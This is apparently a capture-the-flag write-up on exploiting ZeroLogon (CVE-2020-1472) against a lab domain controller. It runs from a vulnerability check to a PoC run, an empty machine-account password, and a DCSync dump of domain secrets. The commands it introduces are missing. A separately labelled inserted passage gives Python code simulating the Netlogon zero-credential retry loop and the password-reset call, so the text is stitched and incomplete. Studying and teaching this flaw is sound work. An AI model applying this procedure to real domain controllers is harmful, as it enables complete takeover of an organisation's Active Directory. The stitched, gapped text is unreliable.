CVE-2020-1472 - ZeroLogon

Overview

The attack described here takes advantage of a flaw in the Netlogon Remote Protocol (MS-NRPC), the cryptographic authentication protocol a domain-joined computer uses to prove its identity to the DC. Because the protocol uses AES-CFB8 with a fixed all-zero IV, an attacker can spoof the identity of any computer account (including that of the DC itself) and set an empty password for that account in the domain. (Secura)

Found Here

Installation

Then cd into the folder and execute

Testing if a DC is vulnerable

Spoiler: if the DC is unpatched, it almost certainly is.

First, clone the following repo and install the requirements

Running the Check Script

Now that we have the testing script installed, we can check a host to see whether it is vulnerable. I will be running this against the Multimaster machine from Hack The Box.

The command is as follows:

Bingo! We can see that the host is vulnerable!

Exploiting a Domain Controller

Risks

If you are doing this in a working production environment, make sure you first have the NTLM hash of the Domain Controller's machine account, because you will need it to restore the original password after exploitation. The exploit only overwrites the password stored in Active Directory; the DC's own local copy (in its LSA secrets) is untouched, so until the AD value is restored to match, the DC can no longer authenticate to the other DCs and replication breaks.

Getting the POC

To get the exploit, clone this git repo and make sure you have impacket installed

Now we can run the exploit against our vulnerable target machine

If all was successful you will get Result: 0 (NTSTATUS 0, i.e. STATUS_SUCCESS).
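To make the overview's AES-CFB8 point and the exchange the PoC drives concrete, here is an offline simulation of the three Netlogon calls involved: the DC side verifies credentials exactly as MS-NRPC describes, and the attacker side retries all-zero values until it gets in, then sets an empty password. This is an added example, not code from this write-up, from Secura, or from any public PoC. It assumes a SHA-256-based stand-in in place of AES-128 so that it runs with the standard library only (the bug is a property of CFB8 with a zero IV, not of AES); the session-key derivation, the zero-IV credential computation and the 516-byte password blob layout follow MS-NRPC, while the class and function names (SimulatedDC, zerologon, set_empty_password, zero_key_fraction) are this example's own.

```python
"""Offline simulation of the Netlogon weakness behind CVE-2020-1472 (ZeroLogon).

Added example: not code from this write-up, from Secura, or from any public PoC.
ASSUMPTION: a SHA-256-based keyed stand-in replaces AES-128 so the script needs
only the standard library. The bug is a property of CFB8 with a fixed all-zero
IV, not of AES, so the mechanics below are unchanged by that substitution.
"""
import hashlib
import hmac
import os

BLOCK = 16
ZERO_IV = bytes(BLOCK)


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Keyed 16-byte pseudo-random block function (stand-in for AES-128, by assumption)."""
    return hashlib.sha256(key + block).digest()[:BLOCK]


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CFB8: each byte is XORed with byte 0 of E_k(shift register), then the
    ciphertext byte is shifted into the register. With IV = 0 and all-zero
    plaintext the register never changes, so the whole output is zero whenever
    E_k(0)[0] == 0x00, which holds for about 1 key in 256."""
    reg, out = bytearray(iv), bytearray()
    for p in plaintext:
        c = p ^ block_encrypt(key, bytes(reg))[0]
        out.append(c)
        reg = reg[1:] + bytes([c])
    return bytes(out)


def cfb8_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    reg, out = bytearray(iv), bytearray()
    for c in ciphertext:
        out.append(c ^ block_encrypt(key, bytes(reg))[0])
        reg = reg[1:] + bytes([c])
    return bytes(out)


def derive_session_key(secret: bytes, client_chal: bytes, server_chal: bytes) -> bytes:
    """MS-NRPC AES session key: HMAC-SHA256(secret, client_chal || server_chal)[:16].
    (On a real DC the secret is the MD4 hash of the machine account password.)"""
    return hmac.new(secret, client_chal + server_chal, hashlib.sha256).digest()[:BLOCK]


def netlogon_credential(session_key: bytes, challenge: bytes) -> bytes:
    """ComputeNetlogonCredential, AES flavour: CFB8 over the 8-byte input with IV = 0."""
    return cfb8_encrypt(session_key, ZERO_IV, challenge)


class SimulatedDC:
    """Server side of the three Netlogon calls the attack uses."""

    def __init__(self, machine_secret: bytes, rng=os.urandom):
        self.secret = machine_secret
        self.rng = rng                     # source of server challenges (injectable for tests)
        self.password_written = None

    def req_challenge(self, client_chal: bytes) -> bytes:   # NetrServerReqChallenge
        self.client_chal, self.server_chal = client_chal, self.rng(8)
        return self.server_chal

    def authenticate3(self, client_cred: bytes) -> bool:    # NetrServerAuthenticate3
        self.session_key = derive_session_key(self.secret, self.client_chal, self.server_chal)
        expected = netlogon_credential(self.session_key, self.client_chal)
        self.client_stored_cred = client_cred
        return hmac.compare_digest(expected, client_cred)    # True == STATUS_SUCCESS

    def password_set2(self, authenticator: bytes, timestamp: int, sealed_blob: bytes) -> int:
        """NetrServerPasswordSet2: check the authenticator (stored credential with the
        timestamp added to its first 4 bytes), then unseal the 516-byte blob: a 512-byte
        buffer holding the password right-aligned, followed by a 4-byte LE length."""
        t = (int.from_bytes(self.client_stored_cred[:4], "little") + timestamp) & 0xFFFFFFFF
        stamped = t.to_bytes(4, "little") + self.client_stored_cred[4:]
        if not hmac.compare_digest(netlogon_credential(self.session_key, stamped), authenticator):
            return 0xC0000022                                  # STATUS_ACCESS_DENIED
        blob = cfb8_decrypt(self.session_key, ZERO_IV, sealed_blob)
        length = int.from_bytes(blob[512:516], "little")
        self.password_written = blob[512 - length:512]
        return 0                                               # STATUS_SUCCESS


def zerologon(dc: SimulatedDC, max_attempts: int = 2000):
    """Attacker: all-zero client challenge and all-zero credential, retried until the DC
    picks a server challenge whose session key has E_k(0)[0] == 0. Returns the attempt
    number that succeeded, or None if max_attempts (the PoC's default) was exhausted."""
    zero8 = bytes(8)
    for attempt in range(1, max_attempts + 1):
        dc.req_challenge(zero8)
        if dc.authenticate3(zero8):
            return attempt
    return None


def set_empty_password(dc: SimulatedDC) -> int:
    """After a successful zerologon(): zero authenticator, timestamp 0 and a 516-byte all-zero
    sealed blob. The same key property makes it unseal to zeros, i.e. length 0, empty password."""
    return dc.password_set2(bytes(8), 0, bytes(516))


def zero_key_fraction(n_keys: int) -> float:
    """Fraction of sequential (constructed) keys for which CFB8 with IV = 0 maps eight
    zero bytes to eight zero bytes; expect roughly 1/256."""
    hits = sum(cfb8_encrypt(i.to_bytes(BLOCK, "big"), ZERO_IV, bytes(8)) == bytes(8)
               for i in range(n_keys))
    return hits / n_keys


if __name__ == "__main__":
    dc = SimulatedDC(os.urandom(16))                           # constructed machine secret
    print("authenticated after", zerologon(dc), "attempts")
    print("NetrServerPasswordSet2 result:", set_empty_password(dc), "password now:", dc.password_written)
    print("fraction of weak keys:", zero_key_fraction(20000))
```

Running it shows the attacker getting in after a few hundred attempts on average, the password set call returning 0, and the stored password becoming the empty string; the weak-key fraction comes out near 0.0039. Note that a DC which required signing and sealing, or which rejected the all-zero client challenge as Microsoft's patch does, would break the loop, which is exactly the point of the fix.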

Dumping Domain Secrets with secretsdump.py

Now that the DC's machine account password is an empty string, "", we can authenticate as that account (DC machine accounts hold replication rights) and DCSync with secretsdump.py to get all the domain secrets.

And just like that I’ve owned your whole AD environment, in less than two minutes.

Respect

If you enjoyed the write-up or found it useful, consider +repping my HTB profile, linked below:
